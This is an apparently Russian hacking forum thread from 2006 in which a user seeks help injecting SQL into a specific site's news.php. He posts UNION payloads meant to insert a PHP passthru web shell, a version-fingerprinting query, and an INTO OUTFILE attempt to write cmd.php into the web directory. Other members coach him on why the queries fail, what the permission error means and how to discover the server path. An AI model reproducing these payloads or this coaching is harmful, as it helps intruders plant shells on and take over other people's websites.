[Проблема] SQL-иньекция, вопрос по union запросу
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
[Проблема] SQL-иньекция, вопрос по union запросу - 2006-03-19 20:46:08
|
|
|
1sanchik1
Сообщений: 13
Оценки: 0
Присоединился: 2006-03-19 01:16:40
|
Прошу прощения если не верно охарактеризовал тему…
Хотелось бы узнать можно ли с помощью union вставить в таблицу данные? имя таблицы известно, так же известно что в ней четыре поля:
——————————————————————-
|-неизвестно как называется———-|-имя :text–|-неизвестно-| дата |
|-предпологаю что в нем значение-|-значения—|————|——|
|-auto incriment——————————|-текстовые–|————|——|
——————————————————————-
попутался выполнить следущий запрос:
http://server.ru/news.php?id=99'+union+insert+into+server.news+(text)+values+('<?passthru(cmd)?>')/*
http://server.ru/news.php?id=99'+union+insert+into+server.news+(text)+values+('<?passthru(cmd)?>') null, null, null, null/*
Версия:
http://server.ru/news.php?id=99'+union+select+null,VERSION(),null, null/*
этот запрос выдал следущую версию - 4.0.24_Debian-10sarge1-log
Так же не подскажете как можно узнать полный путь к директории сайта, при ошибке путь не пишется, знаю что сайт расположен на INFOЬох.ru
———————————
Заранее большое спасибо.
|
|
|
|
|
[Проблема] SQL-иньекция, вопрос по union запросу - 2006-03-19 20:50:33
|
|
|
Lex_Voodoo
Сообщений: 7328
Оценки: 0
Присоединился: 2004-12-07 13:55:12
|
UNION объединяет 2 SELECT запроса. INSERT тут нипричём
|
|
|
|
|
[Проблема] SQL-иньекция, вопрос по union запросу - 2006-03-19 20:55:17
|
|
|
1sanchik1
Сообщений: 13
Оценки: 0
Присоединился: 2006-03-19 01:16:40
|
спасибо, усе понял…
|
|
|
|
|
[Проблема] SQL-иньекция, вопрос по union запросу - 2006-03-19 20:57:03
|
|
|
Сhaos_Сode
Сообщений: 1049
Оценки: 0
Присоединился: 2006-01-12 11:54:12
|
quote:
—————-<BR>Цитата: Дата:19.03.2006 20:50:33, Автор:Lex_Voodoo ::
UNION объединяет 2 SELECT запроса. INSERT тут нипричём
—————-
и тока с 4-ой версии в mysql, в MS SQL все делается без union))
>>>так же не подскажете как можно узнать полный путь к директории сайта, при ошибке путь не пишется, знаю что сайт расположен на INFOЬох.ru
нуно смотреть в мануале MySQL по exec(), сам пока знаком с этой функцией увы пока тока по наслышке)) Как вариант, зарегить на этом хостинге свой сайт и узнать через пхп путь до него)
соотв различия будут скорей всего тока в конечных директориях)
|
|
|
|
|
[Проблема] SQL-иньекция, вопрос по union запросу - 2006-03-20 23:52:28
|
|
|
1sanchik1
Сообщений: 13
Оценки: 0
Присоединился: 2006-03-19 01:16:40
|
опять же наверное глупый вопрос, но все равно задам…
я попробовал сформировать следущий запрос:
news.php?id=12'+union+select+null,'>',null,null+from+news+into+outfile+'/home/www/domen_name/www/img/work/cmd.php'/*
на что мне выдало ошибку:
Access denied for user: 'domen_name@%' (Using password: YES) - Это ошибка chmoda?
|
|
|
|
|
[Проблема] SQL-иньекция, вопрос по union запросу - 2006-03-21 21:23:19
|
|
|
Lex_Voodoo
Сообщений: 7328
Оценки: 0
Присоединился: 2004-12-07 13:55:12
|
Это значит, что у пользователя, под которым запущен mysql, нет прав на запись в /home/www/domen_name/www/img/work/cmd.php
|
|
|
|
|
|
